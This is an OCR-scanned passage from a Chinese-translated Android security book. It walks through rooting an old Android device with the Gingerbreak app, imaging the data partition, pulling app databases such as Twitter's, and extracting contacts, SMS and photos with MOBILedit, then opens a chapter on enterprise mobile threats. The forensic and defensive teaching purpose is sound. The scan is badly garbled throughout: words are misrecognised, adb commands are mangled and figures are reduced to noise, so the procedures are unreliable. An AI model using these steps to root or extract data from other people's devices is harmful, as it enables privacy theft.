下 ， 成 功利 用 系统 存在 的 漏洞 可 以 使 用 户 转 变 成 超级 用 户 。 用 户 可 以 从 网 络 上 下 载 
与 其 设备 版 本 匹配 的 Break. apk 文件 ， 对 设备 进行 root 处 理 。 接 下 来 ， 本 节 将 引导 
用 户 获 取 Froyo?2. 2 版 本 的 Android 操作 系统 的 root 权限 。 

1) 检测 Android 操作 系统 版 本 ， 按 照 “Settings- > About Phone" 顺序 操作 ， 跳 
转 到 “About phone" 界面 查看 ， 如 图 8. 8 所 示 ， 在 “About phone" Ji E, 显示 
有 详细 的 Android 系统 版 本 和 内 核 版 本 信息 。 

2) 通过 adb shell 连接 Android 设备 ， 并 执行 “ID” 命 令 ， 此 时 用 户 为 “shell” 
用 户 身 份 (UID =2000 [shell] ) 。 

3) 考虑 到 用 户 使 用 的 Android 操作 系统 为 Froyo2. 2. 2 版 本 、Gingerhbreads 版 本 
或 HoneycombS9 版 本 ， 所 以 下 载 root 工具 软件 Gingerbreak. apk， 如 图 8. 9 所 示 。 





























E34 C39 R * Dua 11:430 
superuser 


Use debugging connected 
About phone " : 





Status 


superuser v3.1.3 (46) 


Battery use tap to display changelog 


elite not installed 

Legal information geteite 

su binary v3.1.1 (17) 
rwsr-sr-xX  rootroot — /system/bin/su 
tap to check for updates 


is | outdated binary notification 


sf temp unroot 


) : 
swf ota survival 


note: these options are not guaranteed 
and will not work for all devices 


图 8.8 Android 版 本 图 8.9  Gingerbreak 应 用 程序 界面 


4) 激活 USB 调试 功能 。 
5) 执行 命令 “adb Install gingerbreak. apk”， 安 装 Gingerbreak 应 用 程序 。 
6) 启动 Gingerbreak 应 用 程序 ， 该 应 用 程序 将 自动 安装 超级 用 户 应 用 程序 。 








© Android Froyo ( Android 冻 酸 奶 ) ，Android 操作 系统 2. 2 或 2.2.x 版 本 代号 。 一 一 译 者 注 
© Android Gingerbread ( Android 姜 饼 ) ，Android 操作 系统 2. 3. x 版 本 代号 。 一 一 译 者 注 
© Android Honeycomb (Android 蜂 梨 ) ，Android 操作 系统 3. x 版 本 代号 。 一 一 译 者 注 
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7) 现在 ， 使 用 adb 工具 通过 shell 程序 的 命令 行 方式 连接 设备 并 执行 “su” 命 
令 ， 如 图 8. 10 所 示 。 之 后 ,设备 完成 root 处 理 ， 用 户 能 够 浏览 各 种 权限 的 文件 夹 
了 了 ， 例 如 /data/data 目录 。 











C\Windows\system32\cmd.exe - adb shell | 区 到 





8 ^C 
C:\Users\Bluegene>adb shell 
$ id 


id 

uid=2000(shell) gid-2000(shell) groups-1003(graphics),1004(input),1007(1og),1009| 
(mount) ,1911(adb) ,1615(sdcard_rw) ,3961(net_bt_admin),3992(net_bt),3663(inet) 

$ su 


di 

uid=e(root) gid=0(root) groups=1003(graphics),1004(input),1007(l0g),19009(mount), 
1011 (adb),1015(sdcard_rw),3001(net_bt_admin),3002(net_bt),3003(inet) 

ud 








KI 8.10 Android 设备 root 处 理 过 程 中 的 Shell 控制 台 显 示 变 化 














8.5 制作 Android 系统 镜像 





有 了 时， 将 Android 设备 制作 成 镜像 ， 并 利用 分 析 人 员工 作 机 上 的 各 种 工具 分 析 
制作 的 Android 镜像 ， 对 分 析 Android 设备 的 文件 系统 是 很 有 必要 且 十 分 有 用 的 。 
尤其 是 在 需要 将 原始 的 文件 系统 保存 为 赁 证， 或 是 在 以 后 还 要 用 到 原始 的 文件 系 
统 ， 而 不 能 直接 操作 原始 的 文件 系统 ， 但 又 需要 对 该 文件 系统 进行 分 析 调 查 等 处 理 
时 。 对 于 这 种 情况 ， 分 析 人 员 不 可 能 直接 抛 开 原始 目标 设备 开展 分 析 等 工作 。 因 
此 ， 就 需要 将 原始 目标 设备 复制 成 镜像 文件 。 然 后 ， 使 用 生成 的 镜像 文件 进行 调 
查 / 分 析 操 作 。Android 设备 镜像 的 制作 过 程 如 下 : 

1) 使 用 下 面 的 命令 将 下 载 的 mkfs. yaffs2 复制 到 设备 中 的 SD RE, 

adb push mkfs. yaffs2/mnt/sdcard/tmp 


2) 开启 adb shell， 使 用 “su” 命 令 将 用 户 身 份 转换 为 超级 用 户 ( 即 root 用 
户 )。 使 用 下 面 的 命令 将 /mnt/sdcard/tmp/ 目 录 下 的 mkfs. yaffs2 文件 的 权限 修改 
为 755。 


chmod 755/mnt/ sdcard/tmp/ mkfs. yaffs2 


3) 执行 下 面 的 命令 创建 Android 设备 镜像 。 此 时 ， 得 到 生成 的 data. img 镜像 
文件 ， 该 文件 即 为 Android 设备 的 系统 镜像 。 


/ mnt/sdcard/tmp/mkfs. yaffs2 data. img 
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4) 使 用 命令 pull 通过 adb shell 将 数据 提取 到 分 析 人 员 的 工作 机 上 。 
adb pull/ mnt/sdcard/tmp/ data. img 


现在 ， 该 设备 的 镜像 已 经 存放 在 分 析 人 员 的 工作 机 上 了 ， 分 析 人 员 可 以 使 用 各 
种 相关 的 工具 (如 yaffey) 对 该 镜像 进行 分 析 。 使 用 yaffey 工具 分 析 Android 设备 
镜像 的 过 程 如 图 8.11 所 示 ， 该 分 析 工 具 可 从 网 站 http: //code. google. com/p/ 
yaffey/ 上 下 载 获 得 。 










































File Edit Help 
Wu a E E gg 
New Open Close SaveAs Import Export  ExpandAll ColapseAl Rename Delete Properties 
Path jmisc 
[Name Size Permissions Alias Date Modified User Group ^ 
| P system drwxrwxr-x 23/08/2012 21:35:05. system system 
i > ecompass druxrwxrwx 23/08/2012 21:35:03 root — root 
mmilog drwxrvxrwx 13/09/2008 21:50:43 root — root 
wpstiles drxrwxrwx 13/09/2008 21:50:43 shell root 一 
» busybox drwxr-xr-x 18/08/2012 13:06:30 root root | 
b systemlog druxrwxrwx 24/07/2012 17:05:29 root root | 
9 dalvik-cache drwxrwx--x 20/08/2012 21:46:44 system system | 
radio druxrwx--- 19/08/2012 14:18:54 radio radio | 
b property drwx------ 19/08/2012 15:32:54 root root | 
4 app druxrwx--x 20/08/2012 21:46:44 system system | 
| com.koushikdutta.rommanager- Lapk 243MB -ru-r--r-- 20/08/2012 21:46:43. system system | 
| com.h3r3tlc.onnandbup- Lapk 38266 KB -rw-r--r-- 20/08/2012 21:31:06 system system | | 
| stericson.busybox- Lapk 419MB -ru-r--r-- 19/08/2012 15:00:31 system system | 
| vmdl56704.tmp ob 19/08/2012 14:18:13 system system |. 
| com.noshufou.android.su- Lapk LAMB -rw-r--r 18/08/2012 113635 system system | | | 
| com.clobile.DroidBolt-2.apk 5011KB -rw- t- 11/05/2012 13:31:10 system system | 
| com.rovio.angrybirds- Lapk 1646 MB -rw-r--r-- 22/01/2012 18:01:35 system system | 
| com.compelson.meconnector- Lapk 13556 KB -ru-r--r-- 14/08/2012 20:19:27. system system | 
| eu.chainfire.gingerbreak- Lapk 205.24 KB -ru-r--r-- 16/08/2012 15:35:56 system system | 
| com google.android.street- Lapk 259.03 KB -rw-r--r-- 09705/2012 18:22:02 system system | 
| com.android.vending-Lapk 5.08MB -ru-r--r-- 07/08/2012 21:44:59 system system 
| app-private druxrwk--x 13/02/2008 21:50:43 system system 
| 5 dat druxrux--x 20/08/2012 21:46:44 system system | .| 
|» doc m Tel drwxrwi--x 23/0/2012 21:45:25 shell shell — 
| p imise a s us ooo ooo 'drweww--t 13/09/2008 105043 system [misc ] 
EL lantnanie. M— 11/00/2008 11-50-12 raat lan] 
|. Selected Litems 








图 8.11 使 用 Yaffey 工具 分 析 设 备 镜像 


8.6 访问 应 用 程序 数据 库 


正如 本 章 前 面 讨 论 的 ， 应 用 程序 可 以 在 SQLite 数据 库 中 存储 结构 化 的 数据 。 
任何 一 个 应 用 程序 都 可 以 在 这 样 格式 的 路 径 “/data/data/ < appname >/databases” 
目录 下 创建 DB (database， 数 据 库 ) 文件 。 虽然 可 以 先 将 Android 设备 root 处 理 ， 
然后 使 用 SQLite3 命令 行 工具 分 析 这 些 数据 库 文件 。 但 是 ， 相 比 之 下 ， 将 Android 
设备 制作 成 镜像 ， 然 后 使 用 分 析 人 员工 作 机 上 的 各 种 工具 (如 Yaffey 和 SQLite X 
WA) 进行 分 析 ， 则 会 更 加 便捷 。 提 取 数 据 库 文件 并 使 用 SQLite 工具 浏览 数据 库 
文件 内 容 的 操作 步骤 如 下 : 

1) 获取 root 权限 ， 将 手机 上 的 [data 分 区 制作 成 镜像 文件 (操作 过 程 参 见 上 
节 内 容 ) 。 

2) 从 网 站 http: //sqlitebrowser. sourceforge. net/index. html. 上 下 载 并 安装 SQLite 
浏览 需 工 具 。 
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3) 如 图 8.12 所 示 ， 使 用 Yaffey sound MS QNI E SQL 
数据 库 ， Ded M 的 数据 库 文件 提取 到 工作 机 上 ， 或 者 通过 adb shell 执 
行 下 面 的 命令 将 数据 库 文件 提取 到 工作 站 上 : 
adb ey sdcard/ tmp/ twitter. db 




























import Export ExpandAl Colapse Al Rename Delete Properties 





New Open Close Saves 








Path |datajcom.twitter android/databases/twiter.db 





Name Sie Permissions Alias Date Modified User Group ^ 
13/09/2008 2557 10095 10095 
13/00/2008 21:50:57 10008 10008 
13/09/2008 21:50:56 system system 
43/09/2008 21:54:47 10007 10007 
13/09/2008 21:51:38 system system 
13/00/2008 21:50:56 10006 10006 
13/09/2008 2 10079 10079 
13/09/2008 21:50:56 10005 10005 
13/09/2008 2 system system 
20/01/2002 0 10004 10004 
09/05/2012 18:24:12 10036 10036 
13/08/2008 21:50:53 radio — radio 
13/09/2008 2 10068 10068 
10003 10003 
10003 10003 


com.adobe.flashplayer 

b eom.google.android.street 
com.android.providers.subscribedfeeds 

E > eom.android.bluetooth 

b com.dell.android.providers.settings 
com.netgate 

^ com.qualcomm.permission.locapi 
com.oem.engineeringmode.Bluetooth 
com.oem engineeringmode,security 
com.evernote 

^ com.google.android.syncadapters.contacts 
b com.oem,engineeringmode.networksetting 
b com.dellhuanying 
4 com.twitterandroid 
4 databases 








> 














lib drwxr-xr-x 13/09/2008 21:50:52 system system 
b com.cem.engineeringmode VerificationAudio drwxr-x--x 13/09/2008 21:50:52 10002 10002 
> com.android.calendar 13/09/2008 2:50:52 10001. 10001 
b com.oemlog 13/00/2008 21:50:51 10000 10000 
13/09/2008 21:51:34 10086 10086 | 
| 











^ com.oem.engineeringmode.alsproximity. 
? eom.oem.engineeringmode.verificationsimcard 
b com.oem.inputmethod.latin 

> com.ndroid.providers.media 

b comandroid.htmlviewer 


13/09/2008 2 radio radio 
13/02/2008 2 10078 10078 
13/09/2008 25:54 10020 10020 
13/09/2008 21:51:20 10074 10074 


sunaz 























Selected 1 items 


8.12. 应 用 程序 Twitter 的 数据 库 位 置 
4) 如 图 8.13 Bros, TE SQLite 数据 库 浏览 器 中 打开 twitter. db 数据 库 文件 。 



























Fle- Edit- View Help 
Darbklo zug T E 


Database Structure Browse Data | ExecuteSQL | 





























HEINE oer 
ndroid metadata — — table CREATE TABLE android | metadata (locale. TEXT) - 
users table CREATE TABLE users ( id INTEGER PRIMARY KEv,user. id INT UNIQUE NOT NU... 
photos table CREATE TABLE photos (, id INTEGER PRIMARY KEY,url TEXT UNIQUE image BLOB) 
"-user. values table CREATE TABLE user. values (. id INTEGER PRIMARY KEY,name TEXT, value TEXT) 
Iser groups table CREATE TABLE user. groups (, id INTEGER PRIMARY KEY,type INT,tag INT,own... 
'ursors table CREATE TABLE cursors (, id INTEGER PRIMARY KEYkind INTtype INT,owner id... 
tatuses table CREATE TABLE statuses ( id INTEGER PRIMARY KEY,skatus id INT UNIQUE NO... 
tatus, groups table CREATE TABLE status. groups (, id INTEGER PRIMARY KEYtype INT,owner, id I... 
&-messages table CREATE TABLE messages (, id INTEGER PRIMARY KEYtype INT, msg, id INT UNI... | 
«search results table CREATE TABLE search, results ( id INTEGER PRIMARY KEY content TEXT, creat,,, 
| 让 -search_queries table CREATE TABLE search, queries (, id INTEGER PRIMARY KEYtype INT,name TEX... 
lists table CREATE TABLE lists (. id INTEGER PRIMARY KEY, owner. id INT,type INT,list_id I... 
sglite autoindex users 1 index 

^sglite autoindex users 2 index 

"sglite autoindex statuses 1 index 

die auteindex messages 1 index 

sglite autoindex photos 1 index 

user groups id» index CREATE INDEX user. groups idx ON user, groups (type,owner, id,user id) 

tatus groups idx index CREATE INDEX status groups idx ON status groups (type, owner id,tag,g st... 
t7user cursors index index CREATE INDEX user. cursors index ON cursors (kind, tvpe owner. id) 

earch queries index index CREATE INDEX search, queries index ON search, queries (type,name,query) 
^search results index: index CREATE INDEX search results index ON search, results (tag, status id) 












































图 8.13 F SQLite 数据 库 浏览 器 中 分 析 Twitter 数据 库 文件 
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8.7 从 Android 设备 上 提取 数据 


前 面 章 节 ， 已 经 介绍 了 如 何 对 Android 设备 进行 root 处 理 ， 以 及 获取 设备 上 存 
储 的 有 用 信息 。 虽 然 可 以 通过 一 点 一 点 地 提取 数据 的 方法 获取 设备 上 存储 的 有 用 数 
据 。 但 是 在 效率 上 难免 有 些 不 尽 如 人 意 。 因 此 ， 可 以 借助 一 些 工具 提高 数据 获取 的 
效率 。 例如， 使 用 MOBILedit 软件 。MOBILedit 软件 用 于 提取 经 过 root 处 理 的 设备 
上 的 各 种 数据 ， 包 括 联系 人 信息 、SMS 信息 、 应 用 程序 的 数据 库 文件 ， 等 等 。 使 
用 该 软件 从 设备 上 提取 信息 的 操作 步 又 如 下 : 

1) 确定 设备 已 经 过 root 处理， 相关 操作 可 查看 本 章 前 面 几 节 的 介绍 。 

2) 下 载 并 安装 MOBILedit 应 用 程序 ， 如 图 8. 14 所 示 。 










This Wizard will help you go through the. 


Follow instructions in this wizard carefully. RR lg clue 
any advice, visit the online manual with video 


What would you like to connect? 








E © Phone 
ds (C) Internet storage. 
g 5 Data file 
d 7) SIM card reader 
— cs 











到 8. 14 MOBILedit 应 用 启动 界面 
3) 在 MOBILedit 应 用 程序 中 输入 设备 的 卫 地 址 ， 如 图 8. 15 所 示 。 














1. Connect phone to the same Wi-Fi network as your PC 
2. Download MOBILedit Connector from the application market 
3. Run MOBILedit Connector on your phone 


4. Enter the IP address as displayed on your phone: 192 . 158 . 0 .10 








图 8.15 使 用 MOBILedit 连接 Android 设备 


134 Android 系统 安全 与 攻防 





4) 该 应 用 软件 同 移动 设备 连接 上 后 ， 即 可 下 载 / 查 看 各 种 信息 ， 包 括 通话 记 
录 、SMS 信息 、 所 有 的 照片 等 ， 如 图 8. 16 所 示 。 







bn [e a lt tnn 


439.30 MB fres of 590.00 MB. 
Memory Card 


ide i r7 die, 9 (1 


|i 9€ & C C 9 b bb? à 


Phonebook Missed Calls LastDialed Received Messages Medie Fies  Memoy MMSStwage Calendar 
pi Numbers Calis Cmd 





[Go back to previous application view Activate Š 1921680102 CAP NUM SCP: 
TT EE — — UE — Ed 





器 











8.16 提取 联系 人 资料 、 短 信 / 彩 信 、 电 子 邮件 和 照片 


5) 通过 MOBILedit 应 用 软件 还 可 以 下 载 设 备 上 的 其 他 数据 (LE 8.17), 
者 可 以 使 用 前 面 几 节 介绍 的 技术 ， 对 这 些 下 载 的 数据 做 进一步 的 分 析 。 








| BO sdara AB init two g three gre 1548KB <unknown> — 1231/1989 40.. 
5 | £3 «android secure. AB init two g three gvenuerc 562KB <unknown> 12/31/1969 40. 


| 
| 
局 LO5TDR | 
Ow | 
orem | 
-Dpp | 





8.17 从 移动 设备 的 文件 系统 中 提取 数据 
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8.8 小 结 


本 章 介 绍 了 Android 系统 使 用 的 各 种 类 型 的 文件 系统 ， 介 绍 了 安全 专业 人 员 在 
分 析 设 备 和 应 用 程序 时 所 感 兴 趣 的 有 关 分 区 和 挂 载 点 的 相关 知识 ， 应 用 程序 存储 持 
久 化 数据 ( 如 数据 库 、 设 置 参数 、 文 件 等 ) 的 各 种 不 同方 式 ， 以 及 获取 和 分 析 这 
些 信 息 的 各 种 方法 。 同 时 ， 本 章 还 介绍 了 对 Android 设备 进行 root 处 理 的 操作 步 又 
(不 同 的 Android 发 布 版 本 root 处 理 步 又 有 所 差异 ) ， 以 及 使 用 第 三 方 应 用 软件 从 
Android 设备 中 提取 数据 的 方法 。 


第 9 童 企业 环境 Android 系统 的 安全 问题 


本 章 主 要 关注 企业 环境 Android 系统 的 安全 问题 ， 以 及 部 署 Android 应 用 程序 
过 程 中 存在 的 安全 问题 。 首 先 从 一 般 性 的 角度 上 分 析 移 动 设备 的 安全 因素 ， 然 后 以 
具体 的 Android 设备 为 例 ， 进 行 有 针对 性 的 分 析 。 随 后 ， 介 绍 监管 、 合 规 / 审 查 事 
项 ， 以 及 终端 用 户 培 训 方 面 的 问题 。 最 后 ， 讨 论 有 关 增 强 Android 系统 安全 的 问 
题 ， 以 及 如 何 开发 安全 的 Android 应 用 程序 的 问题 。 











9.1 企业 的 Android 系统 


从 企业 的 角度 出 发 ， 企 业 环境 涉及 Android 系统 的 安全 问题 ， 主 要 可 以 涵盖 以 
下 三 个 方面 : Android 设备 的 部 署 、Android 应 用 程序 的 开发 ， 以 及 允许 Android 应 
用 程序 在 企业 环境 下 使 用 所 带 来 的 隐患 。 

WEAR Android 设备 和 应 用 程序 只 是 一 项 简单 的 信息 技术 (IT) 功能 运用 ， 而 开 
发 安全 的 Android 应 用 程序 则 属于 研发 /设计 团队 或 全 开 发 团队 的 工作 范畴 。 


9.1.1 企业 Android 系统 的 安全 问题 


正如 第 1 章 所 讨论 的 ， 当 今 的 移动 设备 (包括 Android 手机 ) 在 硬件 和 软件 功 
能 上 正在 以 极 快 的 速度 发 展 。 

本 书 对 这 些 威 胁 的 评 佑 ， 以 及 采用 的 安全 控制 措施 ， 已 经 无 法 跟 上 移动 设备 上 
各 种 功能 的 发 展 了 。 由 于 这 些 设 备 上 的 功能 日 渐 丰 富 ， 越 来 越 多 的 威胁 不 断 地 向 移 
动 设备 领域 蔓延。 因此 ， 需 要 对 这 些 设备 采取 更 多 的 安全 防护 措施 。 在 企业 中 部 署 
这 些 设 备 或 应 用 程序 之 前 ， 最 重要 的 是 全 面 细致 地 分 析 这 些 移动 设备 可 能 面临 的 威 
胁 ， 以 及 针对 移动 设备 (用户) 上 使 用 /访问 的 企业 资源 的 威胁 。 此 类 分 析 可 以 通 
过 使 用 一 套 威胁 模型 来 完成 。 在 威胁 建 模 中 ， 可 以 从 资产 保护 、 资 产 威胁 和 产生 的 
漏洞 三 个 方面 进行 分 析 。 最 终 ， 给 出 一 套 适合 的 安全 控制 措施 ,减少 这 些 威胁 和 
漏洞 。 

正如 在 第 4 章 简 单 介 绍 的 那样 ， 和 其 他 任何 一 种 操作 系统 类 似 ，Android 系统 同 
样 面临 着 各 种 传统 的 安全 问题 。 本 章 将 对 这 些 问 题 进 行 展开 讨论 ， 其 中 包括 一 些 在 之 
前 讨论 中 有 意 忽 略 、 留 待 后 面 章节 讨论 的 问题 。 下 面 列 出 了 几 个 Android 移动 设备 可 
能 存在 的 安全 问题 (有 关 这 部 分 内 容 的 参考 文档 地 址 为 http://csrc. nist. gov/publica- 
tions/ drafts/800- 124r1/draft_sp800- 124- revl. pdf) : 

1) 缺少 对 设备 的 实际 管控 。 
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2) 使 用 不 可 靠 的 移动 设备 。 

3) 使 用 不 可 靠 的 连接 和 网 络 。 

4) 使 用 不 可 靠 的 应 用 软件 。 

5) 同 其 他 未 知 系统 建立 连接 和 交互 。 

6) 访问 不 可 靠 的 内 容 。 

7) 使 用 位 置 服务 。 

8) 缺少 对 应 用 程序 和 操作 系统 漏洞 补丁 的 管理 。 

1. 缺少 对 设备 的 实际 管控 

移动 终端 设备 往往 由 终端 用 户 随身 管理 ， 而 不 是 由 系统 管理 员 或 安全 专业 人 员 
管理 。 事 实 上 ， 用 户 始终 随身 携带 移动 终端 设备 增加 了 企业 资源 遭受 危害 的 风险 。 
从 用 户 使 用 移动 设备 时 被 人 肩 完 到 移动 设备 丢失 或 被 资 ， 众 多 针对 移动 设备 上 数据 
言 息 的 威胁 源 自 于 缺少 对 这 些 设备 实施 有 效 的 管控 。 移 动 设备 很 有 可 能 丢失 、 被 盗 
或 暂时 脱离 用 户 的 触及 范围 和 视线 范围 。 从 企业 安全 的 角度 上 来 看 ， 应 当 对 可 能 存 
在 的 企业 信息 资源 的 危害 做 出 这 样 的 假设 ， 即 一 旦 这 些 设备 丢失 或 被 禄 ， 它 们 可 能 
落 在 恶意 用 户 的 手中 ， 从 而 造成 设备 曾经 访问 的 企业 资源 或 可 能 存储 的 企业 信息 资 
源 面 临 泄露 的 风险 。 因 此 ， 必 须 针 对 这 样 的 假设 ， 设 计 有 效 的 安全 控制 措施 ， 阻 止 
移动 设备 上 敏感 数据 的 汇 露 。 

考虑 到 最 糟糕 的 情况 发 生 ， 即 丢失 或 被 穷 的 设备 落 入 恶意 用 户 的 手中 。 在 这 种 
情况 下 ， 避 免 设 备 上 信息 遭受 进一步 危害 的 最 好 方式 ， 就 是 给 移动 设备 加 密 (如 
果 重 要 数据 允许 在 移动 设备 上 存储 ) ， 或 从 一 开始 就 禁止 企业 员工 使 用 个 人 移动 设 
备 访问 重要 的 企业 资源 信息 (对 于 Android 智能 手机 来 说 ， 这 点 可 能 很 难 实现 ) 。 
防止 他 人 通过 诊 舌 颖 视 用 户 屏 幕 内 容 ， 最 明智 的 做 法 就 是 使 用 隐私 屏幕 (确实 已 
经 有 了 这 种 针对 手机 屏幕 内 容 保 护 的 设计 了 )。 此 外 ， 如 果 确 实 需 要 访问 企业 资 
源 ， 在 使 用 这 些 设备 时 ， 应 当 开 启 锁 屏 设置 (需要 密码 /PIN 码 ， 才 能 开启 屏幕 ) 。 
当然 ， 最 好 的 安全 做 法 是 在 所 有 的 应 用 程序 上 设置 程序 启动 密码 ， 也 就 是 当 用 户 在 
每 次 使 用 应 用 程序 时 ， 都 要 输入 密码 验证 用 户 身 份 。 不 过 ， 这 样 做 非常 麻烦 ， 以 至 
于 用 户 很 可 能 坚持 不 下 来 (想象 一 下 ， 在 Android 设备 上 ， 每 次 用 户 使 用 Facebook 
应 用 程序 时 都 需要 先进 行 身 份 验证 操作 ， 然 后 才能 正常 登录 Facebook 软件 ) 。 

2. 使 用 不 可 靠 的 用 户 设备 

很 多 企业 在 用 户 设备 管理 方面 都 采用 BYOD ( 自 带 设备 ) 管理 模式 。 实 际 上 ， 
这 也 就 意味 着 用 户 会 把 他 们 自己 的 移动 设备 (自己 买 的 ) 带 入 到 企业 ， 并 用 其 访 
问 企业 资源 。 这 便 会 导致 一 定 风 险 的 出 现 ， 因 为 这 些 设备 对 于 企业 安全 来 说 是 不 可 
靠 的 ， 且 没有 经 过 企业 的 安全 审核 ， 唯 一 只 能 靠 用 户 自 己 ， 出 于 对 企业 资源 信息 安 
全 负责 的 考量 ， 对 自己 的 移动 设备 进行 安全 性 检查 。 因 此 ， 对 于 企业 来 说 ， 这 种 认 
为 所 有 设备 实际 上 都 不 可 靠 的 假设 并 不 是 毫 无 根据 的 。 

企业 必须 针对 移动 终端 设备 ， 强 制 执行 各 项 安全 制度 。 不 论 这 些 设备 是 属于 用 
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户 自己 的 ， 还 是 企业 配 发 的 。 而 且 ， 还 需要 对 这 些 设 备 和 设备 上 面 的 应 用 程序 进行 
监控 。 此 外 ， 其 他 的 安全 方案 还 包括 : 提供 并 要 求 用 户 使 用 企业 定制 的 设备 (这 
些 设备 搭载 了 针对 安全 问题 进行 强化 的 操作 系统 ， 预 先 审核 过 的 应 用 程序 和 各 种 安 
全 使 用 规则 ) ; 允许 用 户 携带 自己 的 移动 终端 设备 ， 但 只 能 使 用 企业 提供 的 防护 完 
善 的 沙 箱 软 件 访问 企业 敏感 信息 资源 。 

3. 连接 到 未 批准 和 不 可 靠 的 网 络 

移动 设备 有 多 种 连接 方式 : 蜂窝 数据 连接 、 无 线 和 蓝牙 连接 ， 以 及 近 场 通信 
(NFC) 等 。 企 业 应 当 假 定 用 户 会 使 用 任意 连接 方式 ， 其 至 会 使 用 所 有 的 连接 方式 。 
这 些 可 选 的 连接 方式 ， 可 以 导致 各 种 类 型 的 攻击 出 现 ， 包括: 网 络 嗅 探 攻击 、 中 间 
人 攻击 和 和 镭 听 等 攻击 类 型 。 以 这 类 攻击 为 例 ， 当 终端 用 户 将 设备 连接 到 任意 一 个 可 
以 获得 (并 且 开 放 ) 的 Wi- 下 网络 时 ， 攻 击 者 即 可 对 用 户 之 间 的 通信 实施 窃听 
(如 果 没 有 对 这 些 通信 采用 防护 措施 ) 。 

确保 开始 通信 之 前 ， 先 对 通信 双方 的 身份 进行 验证 ， 然 后 再 使 用 加 密 技 术 ， 能 
够 有 效 地 降低 这 类 攻击 带 来 的 信息 汇 露 风险 。 

4. 使 用 不 可 靠 的 应 用 程序 

实际 上 ， 这 类 问题 与 台式 机 /笔记 本 电脑 上 出 现 的 问题 一 样 。 在 这 些 终端 设备 
上 ， 用 户 可 以 自由 地 安装 任意 他 们 选择 下 载 的 应 用 程序 。 即 便 员工 的 移动 设备 是 企 
业 配 发 定制 的 ， 设 备 的 所 有 权 归 企业 所 有 ， 并 且 这 些 设备 经 过 企业 的 审核 批准 ， 但 
是 ,用 户 在 使 用 这 些 设备 时 ， 仍 然 可 以 自由 地 安装 他 们 自己 下 载 的 应 用 程序 CER 
非 企业 安全 规章 明令 禁止 这 种 做 法 )。 而 且 ， 对 于 Android 系统 ， 用 户 可 以 从 几 十 
个 应 用 市 场 下 载 应 用 程序 ， 其 至 直接 从 互联 网 上 下 载 应 用 。 

有 几 个 方案 可 以 用 来 减少 这 种 威胁 。 企 业 可 以 通过 制定 安全 规章 或 合理 的 使 用 
规章 制度 ， 明 令 禁 止 使 用 第 三 方 应 用 程序 。 如 果 用 户 想 要 使 用 他 们 的 Android 设备 
访问 企业 资源 ， 可 以 给 他 们 提供 一 个 允许 安装 和 使 用 的 应 用 程序 白 名 单 。 不 过 ， 尽 
管 这 样 可 以 阻止 他 们 安装 特定 的 应 用 程序 〈 比 如 Facebook) ， 但 是 他 们 仍然 可 以 通 
过 其 他 的 方式 使 用 这 些 特定 的 应 用 程序 (例如 ,使 用 浏览 器 通过 网 页 登录 Face- 
book 等 社交 平台 ) 。 因 此 ， 减少 这 种 威胁 最 有 效 的 做 法 ， 就 是 在 执行 安全 规章 的 同 
时 ， 加 强 对 企业 终端 用 户 的 教育 。 此 外 ， 企 业 还 可 以 采用 男 一 套 对 策 ， 即 对 企业 用 
户 的 移动 终端 设备 在 企业 环境 下 进行 监控 。 

5. 连接 不 可 靠 的 系统 

移动 设备 可 以 向 /从 多 个 设备 和 数据 源 同步 数据 。 这 一 功能 可 用 在 电子 邮件 、 
日 程 安排 、 图 片 、 音 乐 和 电影 等 内 容 的 同步 。 这 些 进行 同步 的 数据 源 /目标 设备 可 
以 是 企业 的 台式 /笔记 本 电脑 、 个 人 台式 /笔记 本 电脑 、 网 站 ， 以 及 目前 越 来 越 热 的 
各 种 基于 云 平台 的 服务 。 因 此 ， 可 以 假设 任何 存放 在 设备 上 数据 ， 都 可 能 面临 着 
风险 。 

如 果 企 业 员工 使 用 的 移动 设备 的 所 有 权 属 于 企业 ， 强 制 执行 这 些 安全 制度 能 够 
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有 效 地 阻止 设备 上 的 信息 备份 或 同步 到 未 经 授权 的 数据 源 。 如 果 移 动 设备 是 企业 员 
工 自己 的 ， 那 么 通过 教育 提高 用 户 信息 安全 意识 和 对 设备 实施 监控 (以 及 强制 员 
工 通过 沙 箱 应 用 程序 访问 企业 资源 ) ， 将 成 为 企业 能 够 采用 的 企业 信息 安全 防护 
举措 。 

6. 访问 不 可 靠 的 信息 内 容 

使 用 移动 设备 时 ， 用 户 可 能 会 遇 到 大 量 不 可 靠 的 信息 内 容 (人 例如， 附件、 下 
载 的 文件 和 QR (快速 反应 ) 码 等 )。 其 中 ,多数 不 可 靠 的 信息 内 容 源 自 有 问题 的 
或 未 知 的 数据 源 ， 从 而 给 用 户 和 企业 的 数据 带 来 潜在 的 风险 。 以 QR 码 为 例 ， 在 这 
些 QR 码 包含 的 信息 中 ， 可 能 隐藏 有 恶意 的 URL 地 址 或 下 载 项 。 但 是， 用 户 可 能 
并 没有 意识 到 这 些 问 题 ， 不 加 防备 地 使 用 移动 设备 读 取 这 些 QR 人 码 ， 从 而 成 为 恶意 
攻击 的 受害 者 。 

安装 安全 防护 软件 (杀毒 软件 ) 可 以 在 一 定 程度 上 降低 安全 风险 。 但是， 对 
于 那些 源 自 QR 码 的 攻击 ， 另 一 种 有 效 的 防护 方式 就 是 禁用 照相 机 功能 。 不 过 ， 树 
立 良 好 的 安全 意识 ， 则 是 应 对 任何 安全 威胁 最 为 有 效 的 解决 办 法 。 

7. 使 用 GPS (位 置 相关 的 服务 ) 

如 今 ， 越 来 越 多 的 移动 设备 可 以 被 作为 导航 设备 ， 查 找 各 种 基于 位 置 的 “ 信 
息 ”。 很 多 应 用 程序 需要 依靠 移动 设备 上 的 GPS 功能 提供 的 位 置 数据 。 从 Facebook 
到 yelp， 这 些 应 用 程序 使 用 用 户 的 位 置 数据 ， 改 进 应 用 程序 的 用 户 体 验 。 但 是 ， 这 
也 给 用 户 的 信息 安全 带 来 一 定 的 安全 风险 。 除 了 在 用 户 隐私 方面 埋 下 隐患 外 ， 还 有 
个 问题 ， 就 是 使 攻击 者 可 以 使 用 用 户 的 位 置信 息 ， 发 起 有 针对 性 的 攻击 ， 或 是 根 
据 用 户 的 位 置信 息 猜 测 用 户 的 行为 活动 。 

禁用 GPS 功能 ， 是 降低 这 种 安全 风险 的 一 种 方式 。 但 是 ， 这 并 不 适合 BYOD 
模式 。 另 一 种 行 之 有 效 的 办 法 ， 就 是 通过 宣传 教育 ， 使 用 户 意识 到 使 用 位 置 数据 可 
能 存在 的 信息 安全 隐患 。 同 时 ， 还 可 以 通过 安全 制度 的 有 效 执行 和 落实 ， 阻 止 用 户 
设备 上 的 应 用 程序 〈 例 如， 社交 媒体 应 用 程序 ) 访问 位 置信 息 。 

